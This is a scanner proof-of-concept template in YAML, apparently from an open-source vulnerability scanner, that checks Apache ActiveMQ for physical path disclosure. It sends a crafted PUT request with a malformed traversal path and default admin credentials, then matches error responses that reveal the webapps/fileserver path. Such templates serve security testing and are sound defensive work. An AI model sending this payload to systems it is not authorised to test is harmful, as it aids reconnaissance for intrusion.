dddd/common/config/pocs/activemq-path-disclosure.yaml
SleepingBag945 9a83a1b39f dddd v2.0
2024-04-03 06:32:26 +02:00

29 lines
795 B
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

id: activemq-path-disclosure
info:
name: ActiveMQ Path Disclosure
author: SleepingBag945
severity: info
description: |-
ActiveMQ默认开启PUT请求当开启PUT时构造好Payload(即不存在的目录)Response会返回相应的物理路径信息
reference:
- https://www.hacking8.com/bug-product/ActiveMQ/ActiveMQ%E7%89%A9%E7%90%86%E8%B7%AF%E5%BE%84%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html
http:
- raw:
- |
PUT /fileserver/a../../%08/..%08/.%08/%08\\ HTTP/1.1
Host: {{Hostname}}
username=admin&password=admin
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
words:
- "\\webapps\\fileserver\\"
- "/webapps/fileserver/"
part: body